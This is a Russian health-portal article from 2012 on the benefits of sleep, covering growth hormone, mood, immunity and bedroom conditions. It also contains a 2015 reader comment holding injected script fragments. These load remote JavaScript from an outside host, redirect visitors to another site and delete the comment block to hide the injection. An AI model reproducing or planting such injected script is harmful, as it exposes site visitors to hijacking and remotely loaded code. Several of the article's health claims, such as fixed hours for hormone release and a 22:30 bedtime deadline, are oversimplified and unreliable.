Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сон – лучшее лекарство  >>  Сон – лучшее лекарство
 
Обратная связь
 

Сон – лучшее лекарство

Размер шрифта
29 мая 2012 06:00
  • google_analytics: false
  • Нравится

Для чего нужен сон? Когда следует спать, чтобы сон приносил наибольшую пользу? Чем опасен недосып и какой должна быть комната для сна?
1 

  1. Время роста

Ночью, в период с 23.00 до 01.00 вырабатывается основное количество гормона роста, соматотропина. Этот гормон необходим для роста ребенка или для увеличения мышечной массы у спортсменов. Гормон способствует высвобождению жирных кислот из жировой ткани с дальнейшим использованием их для строительства. Чтобы эффективно использовать действие соматотропина, следует ложиться спать не позднее 22.30.  

  1. Лекарство от депрессии

Ночью организм вырабатывает определенные гормоны: дофамин, норадреналин и серотонин. Эти гормоны также являются нейромедиаторами, то есть обеспечивают нормальную проводимость в нервной системе. Вырабатываются они именно в ночное время. Если нейромедиаторов не хватает, человек погружается в депрессию. Невыспавшийся человек пытается компенсировать плохое настроение приемом пищи, что способствует лишнему весу. Полноценный ночной отдых необходим для хорошего настроения утром. 

  1. Защита от инфекций

Сон абсолютно необходим для того, чтобы бороться с инфекциями, особенно во время болезни. Чтобы победить инфекцию, иммунные клетки должны вырабатывать ферменты. Наиболее активны иммунные клетки в период с 4 до 6 часов утра. Именно в это время идет активная борьба с патогенами, вирусами и бактериями. Полноценный ночной отдых помогает человеку выздороветь или не заболеть.

Какой должна быть спальня?

  1. В спальне не должно быть телевизора, радиоприемника или магнитофона – любых источников раздражения.

  2. В спальне должно быть темно: этому способствуют глухие шторы. Любые источники света (мобильный телефон, электронные часы) препятствуют выработке гормона сна, мелатонина.

  3. Температура в комнате не должна быть выше 20 градусов по Цельсию. Для этого достаточно проветрить спальню перед сном.

Итак, правила здорового сна:

  • Ложиться спать следует до 22-30.
  • Правильный режим сна спасает от депрессии.
  • Полноценный сон помогает иммунитету бороться с инфекциями.
  • В спальне должно быть темно.
  • Температура в спальне должна быть не выше 20 градусов по Цельсию.

     

Сюжеты по теме:
Зачем человеку сон

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уснуть, если мысли бегают в голове   Ученые создали приведение   Как воспитать хороших детей? Усыпите их!   Выпей это и спи как никогда!  
15 июля 2013Сколько нужно спать, чтобы помнить все 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 
30 января 2013Хотите не чувствовать боли – спите дольше 04 января 2013Сбылась мечта студента: уснул, а утром уже все знаешь
 

Слайдшоу

1
Что съесть, когда не спится
Как взбодриться на работе и не попасть под сокращение?
Сон для красоты: как спать, чтобы проснуться красивой

Тесты

1
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.